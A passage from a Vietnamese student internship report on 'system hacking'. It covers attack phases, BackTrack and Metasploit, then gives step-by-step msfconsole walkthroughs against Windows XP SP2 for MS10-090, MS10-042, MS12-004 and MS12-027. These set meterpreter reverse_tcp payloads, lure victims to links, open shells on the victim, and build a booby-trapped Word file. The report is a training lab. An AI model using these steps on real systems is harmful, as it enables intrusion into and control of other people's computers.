SlideShare una empresa de Scribd logo
1 de 42
[Type here]
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG
VÀ AN NINH MẠNG QUỐC TẾ ATHENA
BÁO CÁO THỰC TẬP
SYSTEM HACKING
Giảng viên hướng dẫn: Võ Đỗ Thắng
Sinh viên thực hiện: Bùi Thanh Dung
TP. Hồ Chí Minh,ngày 20 tháng 4 năm 2015
[Type here]
ĐÁNH GIÁ CỦA GIÁO VIÊN HƯỚNG DẪN
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
Tp Hồ Chí Minh, ngày … tháng … năm 2015
Giảng viên hướng dẫn
Võ Đỗ Thắng
[Type here]
ĐÁNH GIÁ CỦA GIÁO VIÊN HƯỚNG DẪN
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
........................................................................................................................................................
Tp Hồ Chí Minh, ngày … tháng … năm 2015
Giảng viên hướng dẫn
[Type here]
LỜICẢM ƠNKHOACÔNG NGHỆTHÔNG TIN
TRƯỜNG ĐẠIHỌCCÔNG NGHIỆPTPHCM
Em xin chân thành cảm ơn trường Đại Học Công Nghiệp TPHCM và khoa Công
Nghệ Thông Tin đã tạo điềukiệncho em hoànthành tốt đợt Thực Tập này. Trong đợt thực
tập này đã cho em những kinh nghiệm quý báu. Những kinh nghiệm này sẽ giúp em hoàn
thiện hơn trong công việc và môi trường làm việc saunày.
Mặc dù em đã cố gắng hoànthànhbáo cáo thực tậpnàyvới tất cả nổ lực của bản thân.
Nhưng do trình độ hiểu biết và kinh nghiệm thực tế có hạn nên chắc chắn khôngthể tránh
khỏi những thiếusót nhất định. Em rất mong nhận được sự đóng góp, chia sẻ để em có thể
làm tốt hơn nữa.
Một lần nữa em xin chân thành cảm ơn.
[Type here]
LỜICẢMƠNTRUNG TÂM ATHENA
Em xin cảm ơn giám đốc Trung Tâm Quản Trị Mạng và An Ninh Mạng Quốc Tế
Athena, cùng các anh chị trongtrungtâm. Đặc biệt, em xin chân thành cảm ơn thầy Võ Đỗ
Thắng đã nhiệt tình giúp đỡ và hướng dẫn em trong suốt thời gian thực tập. Thầy đã tạo
mọi điều kiện thuận lợi, cung cấp nhũng kiến thức cần thiết cũng như đóng góp những ý
kiến quý báu để hoàn thành tốt bài báo cáo này.
Em cũng xin gửi lời cám ơn đến các anh chị, bạn bè đã truyền đạt kinh nghiệm và
tạo điều kiện cho em hoàn thành đềtài này.
Trong quá trình thực hiện đề tài không thể không có những sai sót, mong thầy cô
tại trungtâm ATHENA và các bạn thẳng thắn góp ý đề em rút kinh nghiệm trongcác công
trình tìm hiểu, phát triển sau này.
Một lần nữa em xin chân thành cảm ơn.
[Type here]
MỤC LỤC
Contents
GIỚI THIỆU TRUNG TÂM .............................................................................................................2
Lịch sử hình thành.........................................................................................................................2
Lĩnh vực hoạt động........................................................................................................................2
Đội ngũ giảng viên.........................................................................................................................2
Địa chỉ liên hệ ................................................................................................................................3
MỞ ĐẦU...........................................................................................................................................4
CHƯƠNG I: GIỚI THIỆU ĐỀ TÀI..................................................................................................5
1. Tên đề tài: System hacking.......................................................................................................5
2. System hacking là gì? .............................................................................................................5
3. Môi trường thực hiện..............................................................................................................5
4. Các lỗ hỏng thường được khai thác trong hệ điều hành..........................................................5
5. Quá trình tấn công vào hệ thống.............................................................................................6
Hình 1: quá trình tấn công vào 1 hệ thống .........................................................................................7
CHƯƠNG 2: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM NHẬP TRONG MẠNG LAN...9
1. Giới thiệu về hệ điều hành backtract 5 R3..............................................................................9
2. Giới thiệu về metasploit........................................................................................................10
2.1. Metasploit Enviroment:.................................................................................................11
2.2. Chọn module exploit:Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có hỗ trợ để khai
thác. 11
2.3. Cấu hình các module exploit đã chọn............................................................................11
2.4. Verify những options vừa cấu hình...................................................................................12
2.5. Lựa chọn target.............................................................................................................12
2.6. Lựa chọn payload..........................................................................................................12
2.7. Thực thi exploit.............................................................................................................12
3. Sơ đồ tổng quan hệ thống LAN.............................................................................................12
Hình 2: Sơ đồ tổng quan hệ thống mạng LAN .................................................................................13
4. Xâm nhập và khai thác lỗ hỏng trên win sp sp2....................................................................14
Hình 3: khởi động metasploit..........................................................................................................14
4.1. Sử dụng mã lỗi ms10_090..............................................................................................15
Hình 4.1.1 bước 1 ms10_090..........................................................................................................15
Hình 4.1.2: bước 2 ms10_090........................................................................................................16
4.2. Sử dụng mã lỗi ms10_042..............................................................................................16
[Type here]
Hình 4.2.1 ms10_042 bước 1..........................................................................................................17
Hình 4.2.2 ms10_042 bước 2..........................................................................................................18
Hình 4.2.3 ms10_042 bước 3..........................................................................................................19
Hình 4.2.4 ms10_042 bước 4..........................................................................................................19
4.3. Sử dụn mã lỗi ms12_004................................................................................................20
Hình 4.3.1 ms12_004 bước 1..........................................................................................................20
Hình 4.3.2 ms12_004 bước 2..........................................................................................................21
Hình 4.3.3 ms12_004 bước 3..........................................................................................................22
Hình 4.3.4 ms12_004 bước 4..........................................................................................................23
4.4. Sử dụng mã lỗi ms12_027..............................................................................................23
Hình 4.4.1 ms12_027 bước 1..........................................................................................................24
Hình 4.4.2 ms12_027 bước 2..........................................................................................................25
Hình 4.4.3 ms12_027 bước 3..........................................................................................................26
Hình 4.4.4 ms12_027 bước 4..........................................................................................................26
Hình 4.4.5 ms12_027 bước 5..........................................................................................................27
Hình 4.4.6 ms12_027 bước 6..........................................................................................................28
Hình 4.4.6 ms12_027 bước 6a.....................................................................................................29
Hình 4.4.6 ms12_027 bước 6b ....................................................................................................29
CHƯƠNG 3: XÂY DỰNG HONEYPOT KHAI THÁC XÂMNHẬP LỖ HỔNG TỪ XA QUA MẠNG INTERNET......30
1. Máy chủ ảo VPS...................................................................................................................30
1.1. Định nghĩa.....................................................................................................................30
1.2. Đặc điểm về thông số VPS.............................................................................................30
2. Honeypot..............................................................................................................................30
3. Sơ đồ tổng quan sử dụng Honeypot xâm nhập từ xa thông qua internet...............................31
Hình 5: sơ đồ tổng quan sử dụng Honepot .......................................................................................31
Hình 6: đã cài đặt thành công metasploit trên VPS...........................................................................32
4. Tấn công trên internet...........................................................................................................32
Hình 7: gửi Trojan về máy victim.....................................................................................................33
Hình 8: khai thác thông tin từ máy victim........................................................................................34
CHƯƠNG 4: TỔNG KẾT......................................................................................................................35
TÀI LIỆU THAM KHẢO................................................................................................................36
2
SVTH: Bùi Thanh Dung
GIỚI THIỆU TRUNG TÂM
Lịch sử hình thành
Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế Athena được thành lập
vào năm 2004 là một tổ chức quy tụ nhiều trí thức trẻ Việt Nam đầy năng lượng, nhiệt
huyết và kinh nghiệm trong lĩnh vực CNTT.
Lĩnh vực hoạt động
Trung tâm đã và đang tập trung đào tạo chuyên sâu quản trị mạng, an ninh mạng và
thương mại điện tử theo tiêu chuẩn quốc tế như Microsoft, Cisco, Linux LPI, CEH,…
song song đó trung tâm còn có các chương trình đào tạo cao cấp dành riêng theo đơn đặt
hàng dành riêng của Bộ Quốc Phòng, Bộ Công An, ngân hàng, doanh nghiệp , các cơ
quan chính phủ và tổ chức tài chính,…
Sau gần 10 năm hoạt động, nhiều học viên tốt nghiệp trung tâm Athena đã là chuyên gia
đảm nhận công tác quản lý hệ thống mạng, an ninh cho nhiều bộ ngành như Cục Thông
Tin-Bộ Quốc Phòng, sở thông tin truyền thông các tỉnh,…
Ngoài chương trình đào tạo, trung tâm còn có các chương trình hợp tác và trao đổi công
nghệ với các trường đại học lớn như: ĐH bách khoa tp Hồ Chí Minh, học viện bưu chính
viễn thông, hiệp hội an toàn thông tin(VNISA), viện kỹ thuật quân sự,…
Đội ngũ giảng viên
Tất cả các giảng viên của trung tâm Athena đều tốt nghiệp từ các trường đại học hàng đầu
trong nước và phải có chứng chỉ quốc tế MCSA, MCSE, CCNA, CCNP, Security+, CEH,
có bằng siêu phạm quốc tế MCT(Microsoft Certified Trainer). Đây là các chứng chỉ
chuyên môn bắt buộc đê dù điều kiện tham gia giảng dậy tại trung tâm ATHENA.
Bên cạnh đó các giảng viên thường xuyên đi tu nghiệp và cập nhật kiến thức công nghệ
mới từ các nước phát triển tiên tiến như Mỹ, Pháp, Hà Lan,… và truyền đạt các công nghệ
mới này trong các chương trình đào tạo tại trung tâm ATHENA.
3
SVTH: Bùi Thanh Dung
Địa chỉ liên hệ
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH MẠNG QUỐC TẾ ATHENA
Liênhệ:
-Cơsở1:
92Nguyễn Đình Chiểu, Phường Đa Kao, Q1, TPHCM
Điện thoại: - 0907879477
- 0943230099
- (08)38244041
Gần ngã tư Đinh Tiên Hoàng - Nguyễn Đình Chiểu
-Cơ sở 2:
2Bis Đinh Tiên Hoàng, Phường Đa Kao, Q1, TPHCM
Điện thoại: - 0943200088
- (08)22103801
Cạnh sânvận động Hoa Lư -Cách đài truyền hình Tp HTV 50mét
- Website: http://athena.edu.vn
- E-mail :support@athena.edu.vn
tuvan@athena.edu.vn
4
SVTH: Bùi Thanh Dung
MỞ ĐẦU
Theo thống kê, từ đầu năm 2013 đến nay, tại Việt Nam đã có 2.405 website của các cơ
quan, doanh nghiệp bị xâm nhập, trung bình mỗi tháng có khoảng 300 website bị tấn công.
Ông Vũ Ngọc Sơn, Phó chủ tịch phụ trách Nghiên cứu phát triển của Bkav cho biết, các cơ
quan doanh nghiệp bị tấn công gần như là đầy đủ, từ ít nghiêm trọng đến nghiêm trọng và
rất nghiêm trọng (nhằm đánh cắp các tài liệu mật) và các mã độcnày nhắm cả vào Bộ Công
An, Bộ Quốc phòng, ngân hàng, các cơ quan đơn vị nghiên cứu, các doanh nghiệp…Đã có
những chiến dịch tấn công, phát tán mã độc có chủ đích vào Việt Nam. Trong đó, bản thân
các vụ tấn công trên mạng và các vụ xâm nhập hệ thống công nghệ thông tin là nhằm do
thám, trục lợi, phá hoại dữ liệu, ăn cắp tài sản, cạnh tranh không lành mạnh và một số vụ
mất an toàn thông tin số khác đang gia tăng ở mức báo động về số lượng, đa dạng về hình
thức, tinh vi hơn về công nghệ.
Trước tình hình đó, song song việc ban hành chỉ thị 897/CT-TTg, Thủ Tướng chỉ đạo các
Bộ, ngành, địa phương tăng cường giải pháp đảm bảo an toànthông tin số. Thủ tướng Chính
phủ cũng đã nêu rõ, trong thời gian qua, tình hình mất an toàn thông tin số ở nước ta diễn
biến phức tạp, xuất hiện nhiều nguy cơ đe dọa nghiêm trọng đến việc ứng dụng công nghệ
thông tin phục vụ phát triển kinh tế - xã hội và đảm bảo quốc phòng, an ninh.
Bài báo cáo này sẽ giới thiệu tổng quát về các phương pháp mà Hacker sử dụng để tấn công
xâm nhập và khai thác vào các phiển bản hệ điều hành Windows, hệ điều hành phổ biến
nhất hiện nay tại Việt Nam, từ đó giúp chúng ta nắm rõ cách thức mà Hacker sử dụng và
đưa ra các giải pháp giúp cho mỗi người dùng được an toàn thông tin, bảo mật trong thời
đại Internet ngày nay.
5
SVTH: Bùi Thanh Dung
CHƯƠNG I: GIỚI THIỆU ĐỀ TÀI
1. Tên đề tài: System hacking
2. System hacking là gì?
System System hacking bao gồm những kỹ thuật lấy username, password đựa vào
phần mềm cài trênhệ thốnghoặc tính dễ cài đặt và chạy các dịchvụ từ xa của hệ điều
hành Windows. Nâng quyền trong hệ thống, sử dụng keyloger để lấy thông tin, xóa
những logfile hệ thống. Một khi đã xâm nhập vào hệ thống, Hacker có thể thực hiện
mọi thứ trênmáy tính đó, gây ranhững hậu quả vô cùng nghiêm trọngchocáccánhân,
tổchức.
3. Môi trường thực hiện
Môi trường thực hiện trên windows xp sp2 thông qua các lỗ hỏng đã bị phát hiện.
Thực hiện trên mạng LAN và xây dựng HONEYPOT khai thác xâm nhập lỗ hỏng
từ xa thông qua internet.
4. Các lỗ hỏng thường được khai thác trong hệ điều hành
Như chúng ta đã biết, Windows là hệ điềuhành phổ biến và được sử dụng rộng rãi
nhất trên thế giới hiện nay. Và với việc được tạo nên bằng một cấu trúc lệnh có thể
nói khổng lồ như vậy thì việc sai sót lỗi sẽ là chuyện không tránh khỏi. Việc chiếm
lĩnh hàng đầu của hệ điều hành này cũng là nguyên nhân khiến các hacker tìm kiếm
những lổ hỏng bảo mật để tấn công nhằm kiểm soát hay đánh cắp thông tin.
6
SVTH: Bùi Thanh Dung
Hiện nay các lỗ hổng bảo mật được phát hiện càng nhiều trong các hệ điềuhành, các
Web Server hay các phần mềm khác, ... Và các hãng sản xuất luôn cập nhật các lỗ
hổng và đưa ra các phiên bản mới sau khi đã vá lại các lỗ hổng của các phiên bản
trước. Do đó, người sử dụng phải luôn cập nhật thông tin và nâng cấp phiên bản cũ
mà mình đang sử dụng nếu không các Hacker sẽ lợi dụng điều này để tấn công vào
hệ thống. Thông thường, các forum của các hãng nổi tiếng luôn cập nhật các lỗ hổng
bảo mật và việc khai thác các lỗ hổng đó như thế nào thì tùy từng người.
Microsoft luôn có những cải tiến an ninh vượt trội qua mỗi phiên bản mới của hệ
điều hành Windows. Tuy nhiên, một sự thật là các mối đe dọa mạng vẫn đang ngày
càng phát triển nhanh hơn so với chu trình cập nhật và đổi mới hệ điều hành của
Microsoft.
Tội phạm mạng thường sử dụng các lỗ hổng trong các mã chương trình để truy cập
vào các dữ liệu và tài nguyên trên máy tính bị lỗi bảo mật. Các chương trình độc hại
được thiết kế đặc biệt để khai thác các lỗ hổng này, được gọi là kỹ thuật exploit,
đang ngày càng phổ biến nhanh chóng.
Những sản phẩm của Microsoft thường gặp phải các lỗ hổng bảo mật như HĐH
Windows, Internet Explorer, Windows Server, Microsoft Exchange và
.NetFramework.
5. Quá trình tấn công vào hệ thống
Trước tiên ta sẽ tìm hiểu tổng quát một quá trình tấn công hệ thống. Mục tiêu phía
trước của chúng ta là một hệ thống máy tính. Các bước để tấn công, đánh sập nó, có
thể được liệt kê như hình vẽ bên cạnh. Nó gồm 6 công đoạn như sau:
7
SVTH: Bùi Thanh Dung
Hình 1: quá trình tấn công vào 1 hệ thống
 Enumerate (liệt kê): Trích ra tất cả những thông tin có thể về user trong hệ thống.
Sử dụng phương pháp thăm dò SNMP để có được những thông tin hữu ích, chính
xác hơn.
 Crack: Công đoạn này có lẽ hấp dẫn nhiều Hackernhất. Bước này yêu cầu chúng
ta bẽ khóa mật khẩu đăng nhập của user. Hoặc bằng một cách nào khác, mục tiêu
phải đạt tới là quyền truy cập vào hệ thống.
 Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi giới hạn truy cập từ user binh
thường lên admin hoặc user có quyền cao hơn đủ cho chúng ta tấn công.
 Execute (thực thi): Thực thi ứng dụng trên hệ thống máy đích. Chuẩn bị trước
malware, keylogger, rootkit…để chạy nó trên máy tính tấn công.
 Hide (ẩn file): Những file thực thi, file soucecode chạy chương trình… Cần phải
được làm ẩn đi, tránh bị mục tiêu phát hiện tiêu diệt.
8
SVTH: Bùi Thanh Dung
 Tracks (dấu vết): Tất nhiên không phải là để lại dấu vết. Những thông tin có liên
quan đến bạn cần phải bị xóa sạch, không để lại bất cứ thứ gì. Nếu không khả
năng bạn bị phát hiện là kẻ đột nhập là rất cao.
Tóm lại, quá trình tấn công hệ thống (System hacking) là bước tiếp theo sau quá
trình khảo sát, thu thập thông tin của mục tiêucần tấn công bằng những kỹ thuật như
Footprinting, Social engineering, Enumeration, Google Hacking… đã được áp dụng
cho mục đích truy tìm thông tin.
Khi hệ thống mục tiêu đã được xác định, chúng ta bắt đầu đi vào quá trình tấn công
hệ thống thật sự. Ta phải tiến hành những kỹ thuật khác nhau để làm sao vào được
trong hệ thống đó, thực hiện những việc mà mình mong muốn, như xóa dữ liệu, chạy
chương trình trojan, keylogger…
9
SVTH: Bùi Thanh Dung
CHƯƠNG 2: SỬ DỤNG BACKTRACK ĐỂ KHAI THÁC XÂM NHẬP
TRONG MẠNG LAN
1. Giới thiệu về hệ điều hành backtract 5 R3
Backtrack là một bản phân phối dạng Live DVD của Linux, được phát triển để thử
nghiệm xâm nhập. Backtrack là sự hợp nhất giữa 3 bản phân phối khác nhau của
Linux về thâm nhập thử nghiệm IWHAX, WHOPPIX, và Auditor. Trong phiên bản
hiện tại của nó (5), Backtrack được dựa trên phiên bản phân phối Linux Ubuntu
11.10.
Công cụ Backtrack đã có lịch sử phát triển khá lâu qua nhiều bản linux khác nhau.
Phiên bản hiện nay sử dụng bản phân phối Slackware linux (Tomas
M.(www.slax.org)). Backtrack liên tục cập nhật các công cụ, drivers,... Hiện tại
Backtrack có trên 300 công cụ phục vụ cho việc nghiên cứu bảo mật. Backtrack là
sự kết hợp giữa 2 bộ công cụ kiểm thử bảo mật rất nổi tiếng là Whax và Auditor.
Backtrack 5 chứa một số công cụ có thể được sử dụng trong quá trình thử nghiệm
thâm nhập của chúng ta. Các công cụ kiểm tra thâm nhập trong Backtrack 5 có thể
được phân loại như sau:
 Information gathering: loại này có chứa một số công cụ có thể được sử dụng để
có được thông tin liên quan đến một mục tiêu DNS, định tuyến, địa chỉ e-mail,
trang web, máy chủ mail, và như vậy. Thông tin này được th u thập từ các thông
tin có sẵn trên Internet, mà không cần chạm vào môi trường mục tiêu.
 Network mapping: loại này chứa các công cụ có thể được sử dụng để kiểm tra
các host đang tồn tại, thông tin về OS, ứng dụng được sử dụng bởi mục tiêu, và
cũng làm portscanning.
 Vulnerability identification: Trong thể loại này, chúng ta có thể tìm thấy các công
cụ để quét các lỗ hổng (tổng hợp) và trong các thiết bị Cisco. Nó cũng chứa các
công cụ để thực hiện và phân tích Server Message Block (SMB) và Simple
Network Management Protocol (SNMP).
 Web application analysis: loại này chứa các công cụ có thể được sử dụng trong
theo dõi, giám sát các ứng dụng web.
10
SVTH: Bùi Thanh Dung
 Radio network analysis: Để kiểm tra mạng không dây, bluetooth và nhận dạng
tần số vô tuyến (RFID), chúng ta có thể sử dụng các công cụ trong thể loại này.
 Penetration: loại này chứa các công cụ có thể được sử dụng để khai thác các lỗ
hổng tìm thấy trong các máy tính mục tiêu.
 Privilege escalation: Sau khi khai thác các lỗ hổng và được truy cập vào các máy
tính mục tiêu, chúng ta có thể sử dụng các công cụ trong loại này để nâng cao
đặc quyền của chúng ta cho các đặc quyền cao nhất.
 Maintaining access: Công cụ trong loại này sẽ có thể giúp chúng ta trong việc
duy trì quyền truy cập vào các máy tính mục tiêu. Chúng ta có thể cần để có được
những đặc quyền cao nhất trước khi các chúng ta có thể cài đặt công cụ để duy
trì quyền truy cập.
 Voice Over IP (VOIP): Để phân tích VOIP chúng ta có thể sử dụng các công cụ
trong thể loại này.
 Digital forensics: Trong loại này, chúng ta có thể tìm thấy một số công cụ có thể
được sử dụng để làm phân tích kỹ thuật như có được hình ảnh đĩa cứng, cấu trúc
các tập tin, và phân tích hình ảnh đĩa cứng. Để sử dụng các công cụ cung cấp
trong thể loại này, chúng ta có thể chọn Start Backtrack Forensics trong trình đơn
khởi động. Đôi khi sẽ đòi hỏi chúng ta phải gắn kết nội bộ đĩa cứng và các tập
tin trao đổi trong chế độ chỉ đọc để bảo tồn tính toàn vẹn.
 Reverse engineering: Thể loại này chứa các công cụ có thể được sử dụng để gỡ
rối chương trình một hoặc tháo rời một tập tin thực thi.
2. Giới thiệu về metasploit
Metasploit là một dự án bảo mật máy tính cung cấp các thông tin về vấn đề lỗ
hổng bảo mật cũng như giúp đỡ về kiểm tra thăm nhập và phát triển hệ thống
11
SVTH: Bùi Thanh Dung
phát hiện tấn công mạng. Metasploit Framework là một môi trường dùng để kiểm
tra, tấn công và khai thác lỗi của các service. Metasploit được xây dựng từ ngôn
ngữ hướng đối tượng Perl, với những components được viết bằng C, assembler,
và Python. Metasploit có thể chạy trên hầu hết các hệ điều hành: Linux,
Windows, MacOS.
Metasploit hỗ trợ nhiều giao diện với người dùng:
 Console interface: dùng lệnh msfconsole. Msfconsole interface sử dụng các
dòng lệnh để cấu hình, kiểm tra nên nhanh hơn và mềm dẻo hơn.
 Web interface: dùng msfweb, giao tiếp với người dùng thông qua giao diện
Web.
 Command line interface: dùng msfcli.
2.1. Metasploit Enviroment:
Global Enviroment: Được thực thi thông qua 2 câu lệnh setg và unsetg, những
options được gán ở đây sẽ mang tính toàn cục, được đưa vào tất cả các module
exploits.
Temporary Enviroment: Được thực thi thông qua 2 câu lệnh set và unset,
enviroment này chỉ được đưa vào module exploit đang load hiện tại, không ảnh
hưởng đến các module exploit khác Chúng có thể lưu lại enviroment mình đã
cấu hình thông qua lệnh save. Môi trường đó sẽ được lưu trong ./msf/config và
sẽ được load trở lại khi user interface được thực hiện.
2.2. Chọn module exploit:Lựa chọn chương trình, dịch vụ lỗi mà Metasploit có
hỗ trợ để khai thác.
 Show exploits: xem các module exploit mà framework có hỗ trợ.
 Use exploit_name: chọn module exploit.
 Info exploit_name: xem thông tin về module exploit.
Chúng ta nên cập nhật thường xuyên các lỗi dịch vụ cũng như các modul trên
www.metasploit.com hoặc qua lệnh msfupdate hoặc
svnupdat/opt/metasploit/msf3/.
2.3. Cấu hình các module exploit đã chọn
 show options: Xác định những options nào cần cấu hình.
12
SVTH: Bùi Thanh Dung
 set: cấu hình cho những option của module đó.
Một vài module còn có những advanced options, chúng ta có thể xem bằng cách
gõ dòng lệnh show advanceds.
2.4. Verify những options vừa cấu hình
check: kiểm tra xem những option đã được set chính xác chưa.
2.5. Lựa chọn target
 show targets: những target được cung cấp bởi module đó.
 set: xác định target nào.
2.6. Lựa chọn payload
 show payloads: liệt kê ra những payload của module exploit hiện tại.
 info payload_name: xem thông tin chi tiết về payload đó.
 set payload payload_name: xác định payload module name. Sau khi lựa chọn
payload nào, dùng lệnh show options để xem những options của payload đó.
 show advanced: xem những advanced options của payload đó.
2.7. Thực thi exploit
exploit: lệnh dùng để thực thi payload code. Payload sau đó sẽ cung cấp cho
chúng ta những thông tin về hệ thống được khai thác.
3. Sơ đồ tổng quan hệ thống LAN
13
SVTH: Bùi Thanh Dung
Hình 2: Sơ đồ tổng quan hệ thống mạng LAN
Trong một mạng LAN nội bộ, các máy tính thường kết nối với nhau với khoảng cách
vật lý gần như trong một phòng, một tầng, một tòa nhà, công ty, … Các máy tính
trong mạng LAN có thể chia sẻ tài nguyên với nhau, mà điển hình là chia sẻ tập tin,
máy in, máy quét và một số thiết bị khác. Khi một máy tính ở trong mạng LAN, nó
có thể sử dụng các chương trình, phần mềm quét hệ thống mạng để biết được địa chỉ
IP các host có trong mạng.
Nmap (Network Mapper) là một tiện ích nguồn mở miễn phí cho phát hiện mạng và
kiểm toán an ninh. Nmap và Zenmap (Công cụ hỗ trợ đồ họa của nmap) được cài
đặt sẵn trong BackTrack, sử dụng các gói tin IP giúp xác định host nào có sẵn trên
mạng, các dịch vụ (tên ứng dụng và phiên bản) mà host đó đang cung cấp, hệ điều
hành gì (và các phiên bản hệ điều hành) mà họ đang chạy, loại bộ lọc gói tin hoặc
tường lửa nào đang sử dụng, và nhiều đặc điểm khác. Nmap chạy được trên tất cả
các hệ điều hành, và các gói nhị phân chính thức có sẵn cho Linux, Windows, và
Mac OSX.
Sau khi xác định được các host có trong mạng, ta có thể sử dụng các công cụ quét
lỗi hệ thống để xác định lỗ hổng của hệ thống muốn xâm nhập, từ đó khai thác truy
14
SVTH: Bùi Thanh Dung
cập vào hệ thống. Một trong số các công cụ quét lỗi này là Nessus, download tại địa
chỉ http://www.nessus.org/.
Một khi đã xâm nhập thành công và chiếm được toàn quyền điều khiển hệ thống,
Hacker có thể thực hiện mọi việc trên máy nạn nhân như down/upload files, thay đổi
cấu trúc hệ thống, thực thi chương trình, đánh cắp mật khẩu, cài trojan/ backdoor,…
4. Xâm nhập và khai thác lỗ hỏng trên win sp sp2
Các quá trình tấn công xâm nhập trên win sp sp2 trước tiên đã được tìm hiểu bằng
các công nghệ thăm dò máy bị tấn công.
Và khởi động metasploit trên backtrack 5 R3 bằng cmd: msfconsole
Ví dụ ở đây địa chỉ máy backtrack là 192.168.1.15
Hình 3: khởi động metasploit
15
SVTH: Bùi Thanh Dung
4.1. Sử dụng mã lỗi ms10_090
- Bước 1: Sau khi khởi động metapsloit ta tiến hành:
 Tìm mã lỗi của hệ điều hành do đã thu thập thông tin từ trước:
search ms10_090
 Copy dòng mã lỗi đã được tìm thấy và gắn vào sau use
 Sau đó show các options cần thiết cho tấn công bằng show options ở đây
chúng ta chỉ chú ý tới các option yes.
Hình 4.1.1 bước 1 ms10_090
- Bước 2: set các options và exploit mã lỗi
 Set SRVRHOST <địa chỉ ip backtrack>
 Set PAYLOAD windows/meterpreter/reverse_tcp
 Set LHOST < địa chỉ ip backtrack>
 Sau khi đã set xong các options ta show lai lần nữa để kiểm cho coi đã
đầy đủ chưa.
 Rồi exploit mã lỗi ra một link cho mấy victim truy cập.
16
SVTH: Bùi Thanh Dung
Hình 4.1.2: bước 2 ms10_090
- Bước 3: chờ đợi nạn nhân truy cập link mà ta đã exploit
 Dùng 1 kỹ thuật nào đó để cho máy victim truy cập tới đường link của
chúng ta đã tao
 Sau đó chờ đợi cho backtrack gửi các mã độc tới máy nạn nhân. Và
kết thúc tấn công khi có thông báo successfully.
4.2. Sử dụng mã lỗi ms10_042
- Bước 1: search mã lỗi và show options
 Tìm mã lỗi của hệ điều hành do đã thu thập thông tin từ trước:
search ms10_042
 Copy dòng mã lỗi đã được tìm thấy và gắn vào sau use
17
SVTH: Bùi Thanh Dung
 Sau đó show các options cần thiết cho tấn công bằng show options ở đây
chúng ta chỉ chú ý tới các option yes.
Hình 4.2.1 ms10_042 bước 1
- Bước 2: set options
 Set SRVRHOST <địa chỉ ip backtrack>
 Set PAYLOAD windows/meterpreter/reverse_tcp
 Set LHOST < địa chỉ ip backtrack>
 Sau khi đã set xong các options ta show lai lần nữa để kiểm cho coi đã
đầy đủ chưa.
 Rồi exploit mã lỗi ra một link cho mấy victim truy cập.
18
SVTH: Bùi Thanh Dung
Hình 4.2.2 ms10_042 bước 2
- Bước 3: chờ nạn nhân truy cập đường link chúng ta exploit ra
19
SVTH: Bùi Thanh Dung
Hình 4.2.3 ms10_042 bước 3
- Bước 4: thực hiện ý đồ tấn công
 Session xác định ta đang làm việc với mã lỗi nào
 Session –i 1 chọn máy nạn nhân
 Help để show các tác vụ có thể thực hiện
 Ở đây ta thực hiện tạo 1 thư mục trên desktop của nạn nhân bằng cách
shell để đứng trên máy nạn nhân mkdir <tên thư mục>.
Hình 4.2.4 ms10_042 bước 4
20
SVTH: Bùi Thanh Dung
4.3. Sử dụn mã lỗi ms12_004
- Bước 1: search mã lỗi và show options
 Tìm mã lỗi của hệ điều hành do đã thu thập thông tin từ trước:
search ms12_004
 Copy dòng mã lỗi đã được tìm thấy và gắn vào sau use
 Sau đó show các options cần thiết cho tấn công bằng show options ở đây
chúng ta chỉ chú ý tới các option yes.
Hình 4.3.1 ms12_004 bước 1
- Bước 2: set options
 Set SRVRHOST <địa chỉ ip backtrack>
 Set PAYLOAD windows/meterpreter/reverse_tcp
 Set LHOST < địa chỉ ip backtrack>
21
SVTH: Bùi Thanh Dung
 Sau khi đã set xong các options ta show lai lần nữa để kiểm cho coi đã đầy đủ
chưa.
 Rồi exploit mã lỗi ra một link cho mấy victim truy cập.
Hình 4.3.2 ms12_004 bước 2
- Bước 3: chờ nạn nhận truy cập vào link ta đã exploit được bằng cách nào đó
22
SVTH: Bùi Thanh Dung
Hình 4.3.3 ms12_004 bước 3
- Bước 4: thực hiện ý đồ tấn công
 Session xác định ta đang làm việc với mã lỗi nào
 Session –i 1 chọn máy nạn nhân
 Help để show các tác vụ có thể thực hiện
 Ở đây ta thực hiện tạo 1 thư mục trên desktop của nạn nhân bằng cách shell
để đứng trên máy nạn nhân mkdir <tên thư mục>.
23
SVTH: Bùi Thanh Dung
Hình 4.3.4 ms12_004 bước 4
4.4. Sử dụng mã lỗi ms12_027
- Bước 1: search mã lỗi và show options
 Tìm mã lỗi của hệ điều hành do đã thu thập thông tin từ trước:
search ms12_027
 Copy dòng mã lỗi đã được tìm thấy và gắn vào sau use
 Sau đó show các options cần thiết cho tấn công bằng show options ở đây
chúng ta chỉ chú ý tới các option yes.
24
SVTH: Bùi Thanh Dung
Hình 4.4.1 ms12_027 bước 1
- Bước 2: use mã lỗi mới được tìm thấy
Sau đó sử set các options và exploit ra file word dùng để gửi qua máy victim
từ đó xâm nhập.
25
SVTH: Bùi Thanh Dung
Hình 4.4.2 ms12_027 bước 2
- Các options được set là:
 Set FILENAME <tên file> : tạo ra file dc tiêm mã độc
 Set PAYLOAD windows/meterpreter/reverse_tcp
 Set LHOST <địa chỉ máy backtrack>
 Set LPORT <địa chỉ máy backtrack>
 Exploit để tạo ra file có tên được đặt ở set FILENAME được lưu trữ trong
thư mục /root/.msf4/local/<tên của file word>
- Vd: file word ở đây tên office.doc
- Bước 3: chuyển thư mục đã tạo về Desktop của máy backtrack thuận lợi cho
quá trình tấn công.
26
